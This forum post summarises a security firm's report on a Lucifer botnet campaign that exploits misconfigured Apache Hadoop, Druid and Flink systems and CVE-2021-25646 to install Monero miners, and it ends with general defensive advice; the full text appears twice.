Teacher
Professional
- Messages
- 2,670
- Reaction score
- 783
- Points
- 113
Who is behind the new malware campaign and what are its goals?
Aqua Security identified a new malware campaign targeting the Apache big data stack, specifically Hadoop, Druid, and Flink. Attackers use vulnerabilities and incorrect settings in cloud-based Honeypots to launch these attacks. Only in the last month, more than three thousand of them were recorded.
Apache is a well-known open source foundation that supports many projects. The official Apache website reports more than 320 active projects and 8,000 participants.
Attackers use a new version of the Lucifer DDoS botnet, known since 2020, aimed at vulnerable Linux systems to turn them into bots for mining Monero.
To launch attacks, the campaign under review uses incorrect settings and old vulnerabilities, including CVE-2021-25646 for Apache Druid, which allows a remote unauthorized user to execute arbitrary JavaScript code with server rights.
The campaign reviewed by the researchers consists of several stages: exploiting vulnerabilities or incorrect settings, downloading and executing Lucifer malware, and then downloading and executing the main malicious component-the XMRig miner.
During the six months of monitoring, the campaign has evolved slightly, including changes in the mechanisms for delivering and executing malware.
To protect your organization, it is important to update your systems in a timely manner, configure them correctly, and follow the security guidelines. It is also far from superfluous to use solutions for real-time detection and response, exercise increased caution when using open libraries, and allocate enough time and resources to train employees.
The considered malicious operation reveals the need for careful attention to cybersecurity in the open source Apache software environment, and also emphasizes the importance of comprehensive protection and compliance with best practices for ensuring digital defense.
Aqua Security identified a new malware campaign targeting the Apache big data stack, specifically Hadoop, Druid, and Flink. Attackers use vulnerabilities and incorrect settings in cloud-based Honeypots to launch these attacks. Only in the last month, more than three thousand of them were recorded.
Apache is a well-known open source foundation that supports many projects. The official Apache website reports more than 320 active projects and 8,000 participants.
Attackers use a new version of the Lucifer DDoS botnet, known since 2020, aimed at vulnerable Linux systems to turn them into bots for mining Monero.
To launch attacks, the campaign under review uses incorrect settings and old vulnerabilities, including CVE-2021-25646 for Apache Druid, which allows a remote unauthorized user to execute arbitrary JavaScript code with server rights.
The campaign reviewed by the researchers consists of several stages: exploiting vulnerabilities or incorrect settings, downloading and executing Lucifer malware, and then downloading and executing the main malicious component-the XMRig miner.
During the six months of monitoring, the campaign has evolved slightly, including changes in the mechanisms for delivering and executing malware.
To protect your organization, it is important to update your systems in a timely manner, configure them correctly, and follow the security guidelines. It is also far from superfluous to use solutions for real-time detection and response, exercise increased caution when using open libraries, and allocate enough time and resources to train employees.
The considered malicious operation reveals the need for careful attention to cybersecurity in the open source Apache software environment, and also emphasizes the importance of comprehensive protection and compliance with best practices for ensuring digital defense.
